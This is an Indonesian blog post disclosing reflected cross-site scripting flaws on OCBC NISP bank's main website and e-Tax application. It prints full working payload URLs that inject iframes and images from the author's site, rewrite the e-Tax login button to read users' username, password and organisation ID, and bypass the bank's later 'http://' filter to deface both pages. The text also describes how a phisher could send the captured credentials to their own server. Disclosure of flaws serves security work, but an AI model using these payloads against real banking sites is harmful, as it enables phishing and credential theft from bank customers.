Rabu, 28 Desember 2011

Two Critical XSS Vulnerability on OCBC NISP Bank Website

Published : Rabu, Desember 28, 2011 Author :

Tidak bisa dipungkiri lagi dan telah berulang kali terbukti bahwa Website Bank yang memiliki celah XSS sangat rawan untuk menjadi target penipuan. Senin pagi kemarin saya mendapati 2 celah XSS pada portal Bank OCBC NISP, yaitu pada website utama dan pada aplikasi e-Tax OCBC NISP.


XSS Pada OCBCNISP-DOT-COM

POC:

Search Engine:
1http://www.ocbcnisp.com/?opt=search&search=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&x=0&y=0&lang=1
Pencarian ATM:
1http://www.ocbcnisp.com/?opt=atm&cty=%22%3E%3C/head%3E%3Cbody%3E%3Ccenter%3E%3Ca%20href=%22http://www.spyrozone.net/%22%3E%3Cimg%20border=%220%22%20src=%22http://www.spyrozone.net/playground/xssedbyspyrozone.net.png%22%3E%3C/a%3E%3Cbr%3E%3Ciframe%20width=800%20height=600%20src=http://www.spyrozone.net%3E%3C/iframe%3E%3C/center%3E%3C/body%3E%3Cnoscript%3E&lang=2

Hasil:

{image: Bank OCBC NISP Website Vulnerable to XSS}
Bank OCBC NISP Website Vulnerable to XSS

XSS Pada Aplikasi e-Tax

POC:
1http://etax.ocbcnisp.com/module.asp?module=1&error=%3C/div%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=%2269%22%20colspan=%222%22%3E%3Cdiv%20align=%22center%22%3E%3Cinput%20name=%22Login%22%20type=%22button%22%20%20value=%22Login%22%20onClick=%22alert%28%27Info%20dari%20form%20Login%5Cn--------------------------------------------%5CnUsername:%20%27%2Bdocument.getElementsByName%28%27UserID%27%29[0].value%2B%27%5CnPassword:%20%27%2Bdocument.getElementsByName%28%27Password%27%29[0].value%2B%27%5CnOrganisation%20ID:%20%27%2Bdocument.getElementsByName%28%27orid%27%29[0].value%2B%27%5Cn%5CnInfo%20diatas%20telah%20terkirim%20ke%20server%20WWW.SPYROZONE.NET%27%29;%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E%3Cnoscript%3E
Hasil:
Isikan username, password & ID organisani, kemudian klik tombol [Login].
{image: Celah XSS Pada Aplikasi e-Tax OCBC NISP}
Celah XSS Pada Aplikasi e-tax OCBC NISP
Melalui XSS, saya mengganti tombol submit form menjadi tombol yang akan mengambil data pada form, lalu menampilkannya di layar.
{image: Data korban dikirim ke server lain}
Data korban dikirim ke server lain
Phisher bisa mengganti fungsi saya menjadi fungsi untuk mengirimkan data-data tersebut ke servernya untuk menampung username dan password korban.

UPDATE – 28 September 2011

Admin telah melakukan patch dengan mendeteksi adanya string “http://” pada parameter yang dilempar melalui URL. Namun, Attacker tetap bisa menampilkan informasi palsu pada kedua halaman diatas.
POC:
1http://www.ocbcnisp.com/?opt=search&search=%22%3E%3CH1%3EXSSED%20by%20SPYRO%20KiD%3Cbr%3EWWW.SPYROZONE.NET%3C/H1%3E%3Cnoscript%3E&x=0&y=0&lang=1
Hasil:
{image: ocbcnisp.com Xssed by SPYRO KiD}
ocbcnisp.com Xssed by SPYRO KiD
POC:
1http://etax.ocbcnisp.com/module.asp?module=1&error=%3CH1%3EXSSED%20by%20SPYRO%20KiD%3Cbr%3EWWW.SPYROZONE.NET%3C/H1%3E%3Cnoscript%3E
Hasil:
{image: e-tax OCBC NISP Xssed by SPYRO KiD}
e-tax OCBC NISP Xssed by SPYRO KiD

Penutup

Sekian, semoga bermanfaat ;)

//E.O.F
sumber 
|

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

You can replace this text by going to "Layout" and then "Page Elements" section. Edit " About "